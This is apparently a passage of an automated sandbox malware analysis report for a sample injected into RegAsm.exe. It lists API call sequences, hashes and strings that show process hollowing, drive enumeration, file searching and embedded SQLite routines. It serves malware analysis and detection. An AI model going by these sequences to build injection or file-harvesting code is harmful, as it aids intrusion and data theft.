                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                              • String ID: %s\%s
                                              • API String ID: 2282932919-4073750446
                                              • Opcode ID: 194f6b2605ac6b6736ebe97dbc17ac7b24f5d41313bb03f3b58869011f42aff0
                                              • Instruction ID: 73827212a5f956904d6681c0419b84f2ed9c5454aeabf9d4ca45137ca8f025d0
                                              • Opcode Fuzzy Hash: 194f6b2605ac6b6736ebe97dbc17ac7b24f5d41313bb03f3b58869011f42aff0
                                              • Instruction Fuzzy Hash: B2512FB2900219ABCF20EBB1DD49EDE7B7DAB0A314F0045AAF605E3151D7389789CF65
                                              APIs
                                              • memset.MSVCRT ref: 0040FE81
                                              • memset.MSVCRT ref: 0040FE8D
                                              • CreateProcessA.KERNEL32(?,J#A,00000000,00000000,00000000,08000004,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0040FEAD
                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,?,?,?,00000000,00000000), ref: 0040FEC1
                                              • GetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 0040FED3
                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,00000000,00000000), ref: 0040FEF2
                                              • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,00000000,00000000), ref: 0040FF08
                                              • ResumeThread.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 0040FF18
                                              • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00000000,00000000), ref: 0040FF2F
                                              • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 0040FF66
                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,00000000,00000000), ref: 0040FF91
                                              • SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 0040FFA7
                                              • ResumeThread.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 0040FFB0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$MemoryThread$Write$AllocContextResumeVirtualmemset$CreateRead
                                              • String ID: J#A
                                              • API String ID: 619895632-1027528547
                                              • Opcode ID: 83cccb0ff96274933e56e86008731fb03d161b5d67559e309a12ea4b28d15485
                                              • Instruction ID: b4288349629a217c1a069d56d1852030e3af2687decd945e5e30b7ce06f10167
                                              • Opcode Fuzzy Hash: 83cccb0ff96274933e56e86008731fb03d161b5d67559e309a12ea4b28d15485
                                              • Instruction Fuzzy Hash: 63416D75A00209BFDB219F95DC49FAFBBBAFF46701F00402AFA15E61A0D774A954CB24
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                              • API String ID: 0-860711957
                                              • Opcode ID: aa15d4e34404766ab4b6d4529184986ab385974dcf6a7e74ca40be9cf909de9c
                                              • Instruction ID: 027fd1eb9de08f14e55aa879230442a3895663477ce9307520a68660f2e437ab
                                              • Opcode Fuzzy Hash: aa15d4e34404766ab4b6d4529184986ab385974dcf6a7e74ca40be9cf909de9c
                                              • Instruction Fuzzy Hash: 2E12F2B09047419FE7608F34DC49BDB76E8BF45708F080A2CF89997281E776E549CBA2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ASC$DESC$SELECT %s ORDER BY rowid %s$SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s
                                              • API String ID: 0-3496276579
                                              • Opcode ID: 064e7764d6eea86a0b8b3361bb30fa18d9876731d3b5391c09770f3f821b0501
                                              • Instruction ID: 0bab15be24a751829d1ac1a98a70f2fdb7427531bddfff11bde81422c50964f7
                                              • Opcode Fuzzy Hash: 064e7764d6eea86a0b8b3361bb30fa18d9876731d3b5391c09770f3f821b0501
                                              • Instruction Fuzzy Hash: 0AC100B59007419BCF118F34E8417EAB7E1FF95710F18092EE98ACA641E736F945CBA2
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00416C76
                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00416CD8
                                              • memset.MSVCRT ref: 00416CF7
                                              • GetDriveTypeA.KERNEL32(?), ref: 00416D00
                                              • lstrcpy.KERNEL32(?,00000000), ref: 00416D20
                                              • lstrcpy.KERNEL32(?,00000000), ref: 00416D3E
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00416824: _EH_prolog.MSVCRT ref: 00416829
                                                • Part of subcall function 00416824: wsprintfA.USER32 ref: 0041684F
                                                • Part of subcall function 00416824: FindFirstFileA.KERNEL32(?,?), ref: 00416866
                                                • Part of subcall function 00416824: memset.MSVCRT ref: 0041687D
                                                • Part of subcall function 00416824: memset.MSVCRT ref: 0041688B
                                                • Part of subcall function 00416824: StrCmpCA.SHLWAPI(?,0042790C), ref: 004168A9
                                                • Part of subcall function 00416824: StrCmpCA.SHLWAPI(?,00427910), ref: 004168C3
                                                • Part of subcall function 00416824: wsprintfA.USER32 ref: 004168E7
                                                • Part of subcall function 00416824: StrCmpCA.SHLWAPI(?,004276C3), ref: 004168F8
                                                • Part of subcall function 00416824: wsprintfA.USER32 ref: 0041691E
                                                • Part of subcall function 00416824: memset.MSVCRT ref: 00416944
                                                • Part of subcall function 00416824: lstrcat.KERNEL32(?,?), ref: 00416956
                                                • Part of subcall function 00416824: strtok_s.MSVCRT ref: 0041698F
                                                • Part of subcall function 00416824: memset.MSVCRT ref: 004169A4
                                                • Part of subcall function 00416824: lstrcat.KERNEL32(?,?), ref: 004169B9
                                              • lstrcpy.KERNEL32(?,00000000), ref: 00416D61
                                              • lstrlenA.KERNEL32(?), ref: 00416DC6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
                                              • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                              • API String ID: 2879972474-147700698
                                              • Opcode ID: cacc298ac799cf547cdf163b0edb4fb4cbd924548412a2733e71bb8354a340d2
                                              • Instruction ID: 1703d6cef1096230a7f12549c25830628f45b4ceb85490b3d7b0eeb715a60d6d
                                              • Opcode Fuzzy Hash: cacc298ac799cf547cdf163b0edb4fb4cbd924548412a2733e71bb8354a340d2
                                              • Instruction Fuzzy Hash: 515193B1900259ABDF20EF71DC59EEF7B6DEF16308F10401BB91596162EB388AC4CB95
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 90784594a6216ef764bc45524d11553ac5da7a0da7f2ec3aa7e3c5fbe1f65f23
                                              • Instruction ID: 10c1fcd69aea28deec9bf34bf8083e36c4867748db4cf0ab71bc54ebe988efa3
                                              • Opcode Fuzzy Hash: 90784594a6216ef764bc45524d11553ac5da7a0da7f2ec3aa7e3c5fbe1f65f23
                                              • Instruction Fuzzy Hash: 5781E0F5A05301ABDB109F68CC91BABB3E9EFA4704F04082DF995D7250E7B5F9018B96
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0040B61B
                                              • wsprintfA.USER32 ref: 0040B644
                                              • FindFirstFileA.KERNEL32(?,?), ref: 0040B65B
                                              • StrCmpCA.SHLWAPI(?,00426F3C), ref: 0040B678
                                              • StrCmpCA.SHLWAPI(?,00426F40), ref: 0040B692
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                              • lstrlenA.KERNEL32(00000000,00426C7F,00000000,?,?,?,00426F44,?,?,00426C7E), ref: 0040B742
                                                • Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
                                                • Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
                                                • Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
                                                • Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
                                                • Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
                                                • Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
                                                • Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
                                                • Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
                                                • Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918
                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BBD9
                                              • FindClose.KERNEL32(00000000), ref: 0040BBE8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcatlstrlen$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitwsprintf
                                              • String ID: #$%s\*.*
                                              • API String ID: 1095930517-2760317471
                                              • Opcode ID: e1c24d378bfdfba602383ca6e6df7d14b989e90407ca2097342b50269265c786
                                              • Instruction ID: 75b36c60b1e4bded4045529a093aff9f75072314e802afefe63593af8148a202
                                              • Opcode Fuzzy Hash: e1c24d378bfdfba602383ca6e6df7d14b989e90407ca2097342b50269265c786
                                              • Instruction Fuzzy Hash: AD02627180524DEADF05EBA5C956BDEBB789F15308F00419EE505A31C2DBB827C8CFA6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %lld %lld
                                              • API String ID: 0-3794783949
                                              • Opcode ID: 295d8efefa4e825475288fcf08037ecc1e24e549f67fd33340e7ef97765b83cd
                                              • Instruction ID: 3923a8658243159791b876d0c63865ef56527a401e897e51db7640b2daa2f0c3
                                              • Opcode Fuzzy Hash: 295d8efefa4e825475288fcf08037ecc1e24e549f67fd33340e7ef97765b83cd
                                              • Instruction Fuzzy Hash: EB3106F5601300BBEA115B698C06FEBBAB9DFA5B10F00481CF68592291E776D91187A6
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B7A15A2
                                              • API called with NULL prepared statement, xrefs: 1B7A1571
                                              • %s at line %d of [%.10s], xrefs: 1B7A15B1
                                              • misuse, xrefs: 1B7A15AC
                                              • API called with finalized prepared statement, xrefs: 1B7A1586
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                              • API String ID: 0-860711957
                                              • Opcode ID: 0863eb37e32d960d98cc54f4e05da6e72205ed1e0948b8493a8ff5de5b6543da
                                              • Instruction ID: 502e673fdd7d41f13301e198089004c44ab55e3b5d545a59da7cf5593470c705
                                              • Opcode Fuzzy Hash: 0863eb37e32d960d98cc54f4e05da6e72205ed1e0948b8493a8ff5de5b6543da
                                              • Instruction Fuzzy Hash: E7C105B4D007419BFB608F36E8457DB77E5AF42794F08062CF88A97A41E775E448C7A2
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B7AD5DD
                                              • API called with NULL prepared statement, xrefs: 1B7AD5AC
                                              • %s at line %d of [%.10s], xrefs: 1B7AD5EC
                                              • misuse, xrefs: 1B7AD5E7
                                              • API called with finalized prepared statement, xrefs: 1B7AD5C1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                              • API String ID: 0-860711957
                                              • Opcode ID: af0f2a8edbc44545fe269033fd7d03e1ae75879a0882e5ece156804252fdd6cb
                                              • Instruction ID: 9cb6c699576d136ffa98c3ee663901df29eb110c1a066952a0e8a5aac3c1bdea
                                              • Opcode Fuzzy Hash: af0f2a8edbc44545fe269033fd7d03e1ae75879a0882e5ece156804252fdd6cb
                                              • Instruction Fuzzy Hash: 0DB1AFB49047019FE7518F34D889BDBB7E4BF45708F08462CF8AA9B241E775E449CBA2
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0040A17F
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00426E74,?,?,00426C4F,?), ref: 0040A1FC
                                              • StrCmpCA.SHLWAPI(?,00426E78), ref: 0040A219
                                              • StrCmpCA.SHLWAPI(?,00426E7C), ref: 0040A233
                                              • StrCmpCA.SHLWAPI(?,00000000,?,?,?,00426E80,?,?,00426C52), ref: 0040A2CA
                                              • StrCmpCA.SHLWAPI(?), ref: 0040A34B
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00409391: _EH_prolog.MSVCRT ref: 00409396
                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040A534
                                              • FindClose.KERNEL32(00000000), ref: 0040A543
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologlstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID:
                                              • API String ID: 2015904956-0
                                              • Opcode ID: 92626a6cdc1c63cf4d2f8abad645325172b0a80dbff1d5aa29874edd3c670153
                                              • Instruction ID: 71f4a5b9c756dccbf14c8d77c32d1222cb4a70222b28986d9125b98b8d0954f8
